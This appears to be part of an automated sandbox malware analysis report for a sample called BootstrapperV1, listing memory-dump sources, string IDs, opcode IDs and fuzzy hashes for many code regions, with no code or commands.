                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A$d
                                              • API String ID: 0-892238338
                                              • Opcode ID: 2497660fb4613d8503d5d95b3af9bc18c80027df8fe4303c36168a06568a7234
                                              • Instruction ID: 835956253c4ea5f216c7aabe3d43641b88c0b5f85b8696f00cb82ba00e66942f
                                              • Opcode Fuzzy Hash: 2497660fb4613d8503d5d95b3af9bc18c80027df8fe4303c36168a06568a7234
                                              • Instruction Fuzzy Hash: 78C1FF30A1DB494FD768DB58C4A1935B3E1FF99304B114A7ED08AC36A6DE35F942CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A$d
                                              • API String ID: 0-892238338
                                              • Opcode ID: d09a7326c7a4d180c584e2e280dfb279d5fc7af91a4420febb362e110c361915
                                              • Instruction ID: 4c62446a36bd9dbf399cb86e2e7dbbaec7dc21f663edc9345364b462f3ecf3f8
                                              • Opcode Fuzzy Hash: d09a7326c7a4d180c584e2e280dfb279d5fc7af91a4420febb362e110c361915
                                              • Instruction Fuzzy Hash: AFB10030A18B094FD728EB5894649B6B3E1FF94318B15467ED08AC71A6DE35F942CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [`$[a
                                              • API String ID: 0-1202865014
                                              • Opcode ID: e06a0a638042781b2b44537868bf6e8bbea2b86bb476357a67e0d51b8046aba9
                                              • Instruction ID: 0eb897f182521a230aeba07ea761f1fa670c3458a7e1cee4862ce2f0b84f6c7e
                                              • Opcode Fuzzy Hash: e06a0a638042781b2b44537868bf6e8bbea2b86bb476357a67e0d51b8046aba9
                                              • Instruction Fuzzy Hash: 8641C321B1EF5E0FEAB9A6AC447467932D1EF99610B0602BBD08DC32B6DD19FD019380
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [`$[a
                                              • API String ID: 0-1202865014
                                              • Opcode ID: 80bd96bdf84ffd57b7c9e81bf3421493e0214f59a35c0edf0427f8e9988dbe28
                                              • Instruction ID: 82d9cd643a95187ca0c041da8e05bea91779412cd35dd73f03a9f2bdabfce19c
                                              • Opcode Fuzzy Hash: 80bd96bdf84ffd57b7c9e81bf3421493e0214f59a35c0edf0427f8e9988dbe28
                                              • Instruction Fuzzy Hash: 6E31BF21B1EB0E0FE7A9A7AC54756B873D1EF49624B4502BBD08DC72B7DD19BD428380
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \
                                              • API String ID: 0-2967466578
                                              • Opcode ID: fc7bb133fef2a4558c263983cc8c0b58a8e01d03995f22ba0a4468fd04179b03
                                              • Instruction ID: 1784eea6b2d0ec4b116b5ca0181dd9107b0b25bdef26c1c956a99f87cd6ced4a
                                              • Opcode Fuzzy Hash: fc7bb133fef2a4558c263983cc8c0b58a8e01d03995f22ba0a4468fd04179b03
                                              • Instruction Fuzzy Hash: C9422630B0DB494FEB68DA68C4A567577E1FF99300F0542BED49EC36B3DD28A9428781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: OC^L
                                              • API String ID: 0-3418216847
                                              • Opcode ID: 86e705e7a022eb1710a43cb5e551d984458e8488b90c152b9c620b41ccb80e2f
                                              • Instruction ID: e5600c1654fea9e141c8f463a936aef30449c270bd68b97d907412c81659e208
                                              • Opcode Fuzzy Hash: 86e705e7a022eb1710a43cb5e551d984458e8488b90c152b9c620b41ccb80e2f
                                              • Instruction Fuzzy Hash: 3C22D220B0DA894FE759A7A85469BB97BE1EF55200F5501FAD08EC72F3DD18AE428342
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: zK_H
                                              • API String ID: 0-472741372
                                              • Opcode ID: 9c0681ca5806d94d571f8594a07659976fbac6437ebf7e77b059c16c8a4d10a4
                                              • Instruction ID: 82d0320a65483c3b0e78a368e064854f221aa48df9d0ea588c2f2888cbfb67b2
                                              • Opcode Fuzzy Hash: 9c0681ca5806d94d571f8594a07659976fbac6437ebf7e77b059c16c8a4d10a4
                                              • Instruction Fuzzy Hash: F302D520B0DB4D4FEB95EB5C8464BA5B7E1EF59310F1642EAC08DC71B2CA25AC82C741
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: db26104b882932f22588ee96952d1aef1fd90b919e9ebebb8a60a257f8be35b1
                                              • Instruction ID: cbbd434a72d4b8185085116710db4a4cf24b6fef9cbbe307258ce269e080c9c2
                                              • Opcode Fuzzy Hash: db26104b882932f22588ee96952d1aef1fd90b919e9ebebb8a60a257f8be35b1
                                              • Instruction Fuzzy Hash: 1ED13230B1CB094FD728EB6CD451AB5B3E0EF95314B1446BED08A872A6CE31F8438B91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 3f1f5f2b6a748e7caa70418007d804cfeb39beaf8004a9e985e21d9f8ba40f8f
                                              • Instruction ID: 1f7f86b3cba0efe72ba4578331e6c60b3150f2b1b0024a9b3f85a071bd39f918
                                              • Opcode Fuzzy Hash: 3f1f5f2b6a748e7caa70418007d804cfeb39beaf8004a9e985e21d9f8ba40f8f
                                              • Instruction Fuzzy Hash: 11C10E30B1DB498FD768DB58D451935B3E1FF98300B154ABED0CAC36A6DA35F9428781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: I
                                              • API String ID: 0-3707901625
                                              • Opcode ID: 172bd12b8bcfc6a2b25c44b8a47c8bf23dd71c6d78fae2bb3d5d76ed432b30a2
                                              • Instruction ID: 8a6af67f6dc206d3da63580dc029ac621bab573c74b03fffa9492ec262ce9111
                                              • Opcode Fuzzy Hash: 172bd12b8bcfc6a2b25c44b8a47c8bf23dd71c6d78fae2bb3d5d76ed432b30a2
                                              • Instruction Fuzzy Hash: 0FB16A31A0E7890FEB65DB5894A56F53BA1FF94360F0601FAD48CCB1B7D924E945C390
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [A
                                              • API String ID: 0-3164954885
                                              • Opcode ID: 3ca0d03595b7fe232148878ef95f0bb728c377f5dbb61ed07e497a7d3ac9c8e4
                                              • Instruction ID: 1a8487f291902144943c3eba4cf59eaeed3b742dd15d3066670984b84747b861
                                              • Opcode Fuzzy Hash: 3ca0d03595b7fe232148878ef95f0bb728c377f5dbb61ed07e497a7d3ac9c8e4
                                              • Instruction Fuzzy Hash: 82911A2270EB8E0FE7B996AC68666B57BE1EF5632070512FFD049C71B3DD09AC428350
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 0d4a81454d86dcf3b22497b769933d43fcb9558c7c05dae6b540d0bf7fb8d92d
                                              • Instruction ID: 87d19a51d356e933a3a6f483f4eb6e0781b328bd633ae5c352aecb24b0a04e85
                                              • Opcode Fuzzy Hash: 0d4a81454d86dcf3b22497b769933d43fcb9558c7c05dae6b540d0bf7fb8d92d
                                              • Instruction Fuzzy Hash: 24B12371A0DB8D4FEB95EFAC8464BA97BE1EF59300F0502BAD059C71B7DE28A901C710
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H
                                              • API String ID: 0-2852464175
                                              • Opcode ID: 45818bc4dff892cb83445904cdaea3b72b19d3cb6daff2e0a9550973cad281ff
                                              • Instruction ID: 320b5d6478f1626744ea67c3b9bd7528d31e5800151d27f3f49c2aa6f93aaf49
                                              • Opcode Fuzzy Hash: 45818bc4dff892cb83445904cdaea3b72b19d3cb6daff2e0a9550973cad281ff
                                              • Instruction Fuzzy Hash: AF31A172A0DB894FF750A768582E7B5B7E1EFA4301F09057ED48DC31B2DD28AA468351
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H
                                              • API String ID: 0-2852464175
                                              • Opcode ID: a1263772f8e9da221154bd9c2028509cb0ff333294dd418c45cec19a54e36884
                                              • Instruction ID: 78440578daaf22adddf6fd80e57e1842ade941e8a7deac13852e9b42bb6e5e5f
                                              • Opcode Fuzzy Hash: a1263772f8e9da221154bd9c2028509cb0ff333294dd418c45cec19a54e36884
                                              • Instruction Fuzzy Hash: BF81553171EB4A4FD3699B68D89597077E0EF55320B1903BED08DC72B3D929B8438781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ?Q_H
                                              • API String ID: 0-2706832213
                                              • Opcode ID: 8ec6f249dda5e65d71e53db722eea2d6cd6ff6daafe328538370b9e6d0c59a04
                                              • Instruction ID: 5dc20389bad14208ebc8c34fb9482feb628b8c83c8c9dbb033e1c6a4b5d85a0a
                                              • Opcode Fuzzy Hash: 8ec6f249dda5e65d71e53db722eea2d6cd6ff6daafe328538370b9e6d0c59a04
                                              • Instruction Fuzzy Hash: D471083270DD0D0FEAA8EB5C9465BB933D1EF99310B0602BAE44DC72B6DE19ED428351
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: zJ_H
                                              • API String ID: 0-502210507
                                              • Opcode ID: 7bfd1a73a892ceaf7ec8573104db7b7762bbbca53cc01400b4d335cd07fc1023
                                              • Instruction ID: 788e1216ae2b6486cb59a8a5d34be2126f35fa80bad0a28f2384025592ca3ecd
                                              • Opcode Fuzzy Hash: 7bfd1a73a892ceaf7ec8573104db7b7762bbbca53cc01400b4d335cd07fc1023
                                              • Instruction Fuzzy Hash: 73815A71A0EBCE0FEBA1DB6894A56A93FE2EF56350F0901BAD49CC71B3DD146906C311
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: kK_H
                                              • API String ID: 0-4102571270
                                              • Opcode ID: 9d664adbe3465a1f9793407936275abb55570af9a6994037c00dd2a8a7b3600f
                                              • Instruction ID: 3441ed8ae3984d62bf0584a2544988394f48d3b8f080b0128671f610c94e1af4
                                              • Opcode Fuzzy Hash: 9d664adbe3465a1f9793407936275abb55570af9a6994037c00dd2a8a7b3600f
                                              • Instruction Fuzzy Hash: 02713862B1DE4E0FE7E4A66C94A59F577D1EF9431074502BBE49EC32F6DD18AE028340
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CU_H
                                              • API String ID: 0-2276871341
                                              • Opcode ID: 514fdf4ee0d7fc7153dc6dfc9b913345a854f78f294deb74451cdad63d3c09cb
                                              • Instruction ID: 65f892954b9d7d1760b0981fa2a2392a3ac231524a4c4f88a5e536b789adfdee
                                              • Opcode Fuzzy Hash: 514fdf4ee0d7fc7153dc6dfc9b913345a854f78f294deb74451cdad63d3c09cb
                                              • Instruction Fuzzy Hash: 31715D62B0EA890FE7A8966C18797747BD2DF99250B1A01FBD09CC72F7DC056D068351
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              • Opcode Fuzzy Hash: 7ca663821a92dacb2ce14d2fba70ce9e0131314b867814eab6e5ce6ab63deb08
                                              • Instruction Fuzzy Hash: 67C1E730B0DB4D4FDB64EF6888659B97BE1FF99700B0502BEE449C72B3DE24A9418781
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b59b97b6f3b042a585690f77df4fc4f4a9a256a7ec7b9783bd74cbc216bfef44
                                              • Instruction ID: 50c7827ed44fc3b4e0706226620bb1302a826c65af2f241d3d2408dc81c14143
                                              • Opcode Fuzzy Hash: b59b97b6f3b042a585690f77df4fc4f4a9a256a7ec7b9783bd74cbc216bfef44
                                              • Instruction Fuzzy Hash: 62C1E670A1DB4D4FE764EB2884696B5B7E2FFA4300F44457DE48DC32B6DE34A8028742
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ddbfc9ee58916be8e53042bc97f6b1c46d11bc45d672f777e2fb5afa3a81cea7
                                              • Instruction ID: befdc8722f5dbfb50f45de7edcb79a934ae819b52ba264492291fccc4734640e
                                              • Opcode Fuzzy Hash: ddbfc9ee58916be8e53042bc97f6b1c46d11bc45d672f777e2fb5afa3a81cea7
                                              • Instruction Fuzzy Hash: EDA1B03170EE0E4FEAF4EA9C94A4B6473D2EFA832471916BAD40DCB2B6D915ED418350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7dab02139a4a4840004db908d7320696cac782ab9d8cf656b30b756eaf33156
                                              • Instruction ID: fbba81edee7c497f3f3b3d4b3edbd3dbc7929e3768bb5b30321134a825c56ea6
                                              • Opcode Fuzzy Hash: e7dab02139a4a4840004db908d7320696cac782ab9d8cf656b30b756eaf33156
                                              • Instruction Fuzzy Hash: 3EA10823F0F65A4AF32577AC78698FDB760EF8027AB5903B7D1DD490F79C0426468291
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67381129b6a906d9b7a6af7bc82b22027505d981c1feacce48534496c50790e3
                                              • Instruction ID: 730f844ddbe26498e07a6ef40bb76e8600ae8d3342b1e2f3a20052dcdd150e59
                                              • Opcode Fuzzy Hash: 67381129b6a906d9b7a6af7bc82b22027505d981c1feacce48534496c50790e3
                                              • Instruction Fuzzy Hash: 9DA10671B0DB4C4FEB68DA5CA8566B977E1EF99710F04027FE48AC32B1DA25F8418781
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ec29fa5996bb0d7ac6703154bbcd8f6bec132249c6860917327f6032a0e8d1d
                                              • Instruction ID: 7c2d8455d0f893950a37828643468a59d74c78438e114c3177e026944c1e2a1a
                                              • Opcode Fuzzy Hash: 0ec29fa5996bb0d7ac6703154bbcd8f6bec132249c6860917327f6032a0e8d1d
                                              • Instruction Fuzzy Hash: FAA1CF30B19A494FEB94EF6884A4BB477D2EF68300B4541BAD84DCB2B7DD24ED45C790
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac7bf4a3decdab557c4922603ac152bf59ac0f74c05f5c0d71b10d9121d06663
                                              • Instruction ID: bda851cb984ac12569f929f0908d44b61e285a9899459f7f8d517019ec641f48
                                              • Opcode Fuzzy Hash: ac7bf4a3decdab557c4922603ac152bf59ac0f74c05f5c0d71b10d9121d06663
                                              • Instruction Fuzzy Hash: 4A814952B0EE4E1FEBA8EA6C587967577C2EF98250B4402BED44DC32F7DD18AC424380
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 00b3bafd9f3e2098e621dbb92f1614c26c053b25a6c082f38091857d71989dc8
                                              • Instruction ID: 0d5782159d46c5bd9d8652ebd72f1f2a2315682fd22e19886b47a593bbe901ed
                                              • Opcode Fuzzy Hash: 00b3bafd9f3e2098e621dbb92f1614c26c053b25a6c082f38091857d71989dc8
                                              • Instruction Fuzzy Hash: D0913931A0EA8D4FDB95EF688465BB93BE1FF55310F0502BBE049C71B2CE289942C350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9aed9d3b60f5b7adfeff4a5867cddf4d893affe7d768ffc66a852fd9c18342c7
                                              • Instruction ID: f92c3a8642d86bfeaee02dff05cff7dbd6c6df80d9f6d8a8969415f3ef1b175f
                                              • Opcode Fuzzy Hash: 9aed9d3b60f5b7adfeff4a5867cddf4d893affe7d768ffc66a852fd9c18342c7
                                              • Instruction Fuzzy Hash: 59A1E462E0E68D4FE754E7A898A5AECBBB1FF54714F0503BAE089D71E3DD1829028711
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2c112b93a4f67841f37239500a3c380ecb8ee6331ba9e55eafeb09cfe76a0f43
                                              • Instruction ID: 19341193a7d9b47cad651b5ca52096cf956e9a97f5b80198d8f3edd3a666aa61
                                              • Opcode Fuzzy Hash: 2c112b93a4f67841f37239500a3c380ecb8ee6331ba9e55eafeb09cfe76a0f43
                                              • Instruction Fuzzy Hash: 5BA10231B0EB4A4FE7699A68C46567577E1FF55310F1602BAD04AC72F2DE28ED428341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd2c9c1b8fdbb7461cb6bb7d0e7f607dfe511d19865e298faff102fbfd432c6a
                                              • Instruction ID: dbbc7a8b6657884c38c8bb231e3861fa38a85e78218d297e06c658bf3ded442c
                                              • Opcode Fuzzy Hash: cd2c9c1b8fdbb7461cb6bb7d0e7f607dfe511d19865e298faff102fbfd432c6a
                                              • Instruction Fuzzy Hash: D1B1D431A0EB8E4FEBA5EF6888746B977E1EF55300F1501BAD489C71F2DE29A941C701
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d660c7798e6777e463e3a5a65f429ec8de093dc871cdf7293c6cdbaba989c4a
                                              • Instruction ID: efedebf4d0ffe142ebf20ff81762365212f34b521c4d4ba384ebc43c21249375
                                              • Opcode Fuzzy Hash: 7d660c7798e6777e463e3a5a65f429ec8de093dc871cdf7293c6cdbaba989c4a
                                              • Instruction Fuzzy Hash: 75A14631B0DB494FE765EB6C8465AB5B7E1EF85300F1405FED089C71A7DA29A882C381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d40a3cba1530103071beffc30a775e8e29c9c3706e55113d7c3a08b2b6b2e2e9
                                              • Instruction ID: a2394ebc1a0ab45304edddda3eb8a2a6b84a699aff9898fef5d710d79b61dd26
                                              • Opcode Fuzzy Hash: d40a3cba1530103071beffc30a775e8e29c9c3706e55113d7c3a08b2b6b2e2e9
                                              • Instruction Fuzzy Hash: 37A1E731A0E78E4FEBA5EF6888756B97BE1EF55300F0501BAD489C71F2DD29A941C701
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ac65c532a652324a0aa149e7801a7f28d54071160b1a6f1893d377d2d9cd93c
                                              • Instruction ID: 163f5d4a1218cff80c7807574c8b808588275fe44b6b8aded7ee829dcfd4f905
                                              • Opcode Fuzzy Hash: 4ac65c532a652324a0aa149e7801a7f28d54071160b1a6f1893d377d2d9cd93c
                                              • Instruction Fuzzy Hash: 0CA14271E1965D8FEBA8DBA8D8657AC77B1FF58301F0101BAD00DE32A6CE395981CB50
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a5ace427707359b566e0283a05a61ade9f108a76b9d6edaa5fa8b536e142a63a
                                              • Instruction ID: 02512c8a0a84493c285fe2156ef7ab44051e7b8d2054b5baa2fe346e35160b78
                                              • Opcode Fuzzy Hash: a5ace427707359b566e0283a05a61ade9f108a76b9d6edaa5fa8b536e142a63a
                                              • Instruction Fuzzy Hash: E691D27170CA4D4FDB98EB18C465ABA37E1EF99310B0405AEE48EC72A6DE25EC42C740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79173b88fd44cad9746047824e63717e2aeeca1e48ad17f4e4c14a972a5b86c1
                                              • Instruction ID: c70d6654369b2989ee5dfe83198fac9c771770169e20704c9d20ef147a761037
                                              • Opcode Fuzzy Hash: 79173b88fd44cad9746047824e63717e2aeeca1e48ad17f4e4c14a972a5b86c1
                                              • Instruction Fuzzy Hash: 46A17531B19A4E8FDF98EF58C8A5AB973A1FF58304F11017AD45EC32A6DE35A841C740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d72145b7032a880a79ebbf1fbdca7a06fa4273f7af1e98a1bd789b997aa96be7
                                              • Instruction ID: 5f87900e034ddb438bf552c7c1912fe4bfb4a7b32e549e362b2790975a491fbf
                                              • Opcode Fuzzy Hash: d72145b7032a880a79ebbf1fbdca7a06fa4273f7af1e98a1bd789b997aa96be7
                                              • Instruction Fuzzy Hash: BB91C763E0FBC50FE365976C68B55F97BA0EF9122470903FBD0D88A0F7E8196A458351
                                              Memory Dump Source
